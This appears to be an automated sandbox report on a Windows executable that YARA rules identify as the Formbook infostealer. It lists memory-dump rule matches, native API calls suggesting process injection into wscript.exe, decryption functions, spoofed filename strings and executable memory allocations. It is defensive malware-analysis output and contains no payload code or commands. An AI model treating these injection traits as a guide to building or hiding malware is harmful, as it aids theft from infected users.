Source: 00000005.00000000.444851968.0000000009A29000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.485892584.0000000000430000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.485892584.0000000000430000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.425119255.00000000035F1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.425119255.00000000035F1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.485646603.00000000000C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.485646603.00000000000C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 0_2_003300F0 0_2_003300F0
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 0_2_003369C9 0_2_003369C9
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 0_2_00336D30 0_2_00336D30
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 0_2_0033E418 0_2_0033E418
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 0_2_00339409 0_2_00339409
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 0_2_0033E685 0_2_0033E685
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 0_2_0033CC98 0_2_0033CC98
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 0_2_00336D21 0_2_00336D21
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 0_2_00338FD0 0_2_00338FD0
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 0_2_048C6B67 0_2_048C6B67
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 0_2_048C51CC 0_2_048C51CC
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 0_2_048C5F99 0_2_048C5F99
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_00401030 4_2_00401030
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_0041BA85 4_2_0041BA85
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_0041C296 4_2_0041C296
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_0041BBE0 4_2_0041BBE0
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_00408C6B 4_2_00408C6B
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_00408C70 4_2_00408C70
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_0041C40C 4_2_0041C40C
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_0041C4F7 4_2_0041C4F7
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_0041C55C 4_2_0041C55C
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_00402D90 4_2_00402D90
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_02441238 6_2_02441238
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0239E2E9 6_2_0239E2E9
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023A2305 6_2_023A2305
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023EA37B 6_2_023EA37B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023A7353 6_2_023A7353
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023C63DB 6_2_023C63DB
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0239F3CF 6_2_0239F3CF
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023CD005 6_2_023CD005
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023B905A 6_2_023B905A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023A3040 6_2_023A3040
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0239E0C6 6_2_0239E0C6
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_02442622 6_2_02442622
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023A4680 6_2_023A4680
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023AE6C1 6_2_023AE6C1
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023AC7BC 6_2_023AC7BC
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0242579A 6_2_0242579A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023D57C3 6_2_023D57C3
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023DD47D 6_2_023DD47D
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023B1489 6_2_023B1489
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023D5485 6_2_023D5485
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023A351F 6_2_023A351F
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023BC5F0 6_2_023BC5F0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_02453A83 6_2_02453A83
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023C7B00 6_2_023C7B00
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0242DBDA 6_2_0242DBDA
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0244CBA4 6_2_0244CBA4
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0239FBD7 6_2_0239FBD7
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023C286D 6_2_023C286D
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023AC85C 6_2_023AC85C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0243F8EE 6_2_0243F8EE
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_02425955 6_2_02425955
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023A29B2 6_2_023A29B2
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023B69FE 6_2_023B69FE
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0244098E 6_2_0244098E
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023D2E2F 6_2_023D2E2F
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023BEE4C 6_2_023BEE4C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023B0F3F 6_2_023B0F3F
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023CDF7C 6_2_023CDF7C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023D0D3B 6_2_023D0D3B
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\wscript.exe Code function: String function: 0239E2A8 appears 35 times
Source: C:\Windows\SysWOW64\wscript.exe Code function: String function: 023E3F92 appears 88 times
Source: C:\Windows\SysWOW64\wscript.exe Code function: String function: 023E373B appears 213 times
Source: C:\Windows\SysWOW64\wscript.exe Code function: String function: 0239DF5C appears 106 times
Source: C:\Windows\SysWOW64\wscript.exe Code function: String function: 0240F970 appears 75 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_004185D0 NtCreateFile, 4_2_004185D0
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_00418680 NtReadFile, 4_2_00418680
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_00418700 NtClose, 4_2_00418700
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_004187B0 NtAllocateVirtualMemory, 4_2_004187B0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023900C4 NtCreateFile,LdrInitializeThunk, 6_2_023900C4
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023907AC NtCreateMutant,LdrInitializeThunk, 6_2_023907AC
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FAB8 NtQueryValueKey,LdrInitializeThunk, 6_2_0238FAB8
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FAE8 NtQueryInformationProcess,LdrInitializeThunk, 6_2_0238FAE8
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 6_2_0238FAD0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FB68 NtFreeVirtualMemory,LdrInitializeThunk, 6_2_0238FB68
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FB50 NtCreateKey,LdrInitializeThunk, 6_2_0238FB50
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FBB8 NtQueryInformationToken,LdrInitializeThunk, 6_2_0238FBB8
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238F900 NtReadFile,LdrInitializeThunk, 6_2_0238F900
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238F9F0 NtClose,LdrInitializeThunk, 6_2_0238F9F0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 6_2_0238FED0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FFB4 NtCreateSection,LdrInitializeThunk, 6_2_0238FFB4
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FC60 NtMapViewOfSection,LdrInitializeThunk, 6_2_0238FC60
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FD8C NtDelayExecution,LdrInitializeThunk, 6_2_0238FD8C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FDC0 NtQuerySystemInformation,LdrInitializeThunk, 6_2_0238FDC0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_02390078 NtResumeThread, 6_2_02390078
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_02390060 NtQuerySection, 6_2_02390060
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_02390048 NtProtectVirtualMemory, 6_2_02390048
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023910D0 NtOpenProcessToken, 6_2_023910D0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0239010C NtOpenDirectoryObject, 6_2_0239010C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_02391148 NtOpenThread, 6_2_02391148
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023901D4 NtSetValueKey, 6_2_023901D4
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FA20 NtQueryInformationFile, 6_2_0238FA20
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FA50 NtEnumerateValueKey, 6_2_0238FA50
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FBE8 NtQueryVirtualMemory, 6_2_0238FBE8
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238F8CC NtWaitForSingleObject, 6_2_0238F8CC
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238F938 NtWriteFile, 6_2_0238F938
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_02391930 NtSetContextThread, 6_2_02391930
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FE24 NtWriteVirtualMemory, 6_2_0238FE24
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FEA0 NtReadVirtualMemory, 6_2_0238FEA0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FF34 NtQueueApcThread, 6_2_0238FF34
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FFFC NtCreateProcessEx, 6_2_0238FFFC
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FC30 NtOpenProcess, 6_2_0238FC30
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FC48 NtSetInformationFile, 6_2_0238FC48
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_02390C40 NtGetContextThread, 6_2_02390C40
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FC90 NtUnmapViewOfSection, 6_2_0238FC90
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\wscript.exe Process Stats: CPU usage > 98%
Sample file is different than original file name gathered from version info
Source: ejecutable2.exe, 00000000.00000002.424354114.00000000011E4000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameUIntPtrTypeIn.exe4 vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.423754997.00000000004B0000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameColladaLoader.dll4 vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.424055969.00000000005BF000.00000004.00000020.sdmp Binary or memory string: OriginalFilenamesctasks.exej% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.425701287.0000000004910000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameCF_Secretaria.dll< vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.423882102.0000000000514000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameclr.dllT vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameCSRSS.Exe.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamewinsrv.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameWinInit.exe.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameWINLOGON.EXE.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameuser32j% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameservices.exe.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamelsasrv.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamesvchost.exe.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameSETUPAPI.DLL.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamewshtcpip.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamewship6.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamewshqos.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameAUTHUI.DLL.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenametzres.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamesppsvc.exe.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameInput.DLL.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameTipTsf.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameSpTip.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameTableTextService.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamegpsvc.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameaero.msstyles.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenametaskcomp.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamespoolsv.exe.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameBFE.DLL.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameFirewallAPI.DLL.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenametaskhost.exe.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameUSERINIT.EXE.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: originalfilename vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameEXPLORER.EXE.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameMSCMS.DLL.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamej% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameMsCtfMonitor.DLL.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamesnmptrap.exe.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamelmhsvc.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamedwm.exe.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamedhcpcore.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamepeerdistsh.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameNetLogon.DLL.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamesstpsvc.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamelocalspl.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamenetmsg.DLL.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameSHELL32.DLL.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameFXSRESM.DLL.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenametaskeng.exe.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameWsdMon.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamevsstrace.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameWLDAP32.DLL.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamenetprofm.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameThemeUI.DLL.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameExplorerFrame.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameesrb.dll.muiH vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamexpsrchvw.exe.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamestobject.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamerasdlg.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameAltTab.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamewscui.cpl.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameHCPROVIDERS.DLL.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameSearchIndexer.exe.mui@ vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamePNIDUI.DLL.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenametquery.dll.mui@ vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameesent.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamesidebar.EXE.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameMsMpRes.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenametwext.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamempr.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameschedsvc.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameFDResPub.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameFunDisc.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamerpcrt4.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameFDPrint.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameBASEBRD.DLL.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameimageres.DLL.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameWINMM.DLL.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameDocumentPerformanceEvents.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameWerConCpl.DLL.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameMSHTML.DLL.MUID vs ejecutable2.exe
Source: ejecutable2.exe, 00000004.00000002.487824120.0000000000AD0000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000004.00000002.486080402.0000000000560000.00000040.00020000.sdmp Binary or memory string: OriginalFilenamewscript.exe` vs ejecutable2.exe
Source: ejecutable2.exe, 00000004.00000000.422762878.00000000011E4000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameUIntPtrTypeIn.exe4 vs ejecutable2.exe
PE file contains strange resources
Source: ejecutable2.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CmsVPZkxbOtm.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\Desktop\ejecutable2.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: ejecutable2.exe Virustotal: Detection: 27%
Source: C:\Users\user\Desktop\ejecutable2.exe File read: C:\Users\user\Desktop\ejecutable2.exe Jump to behavior
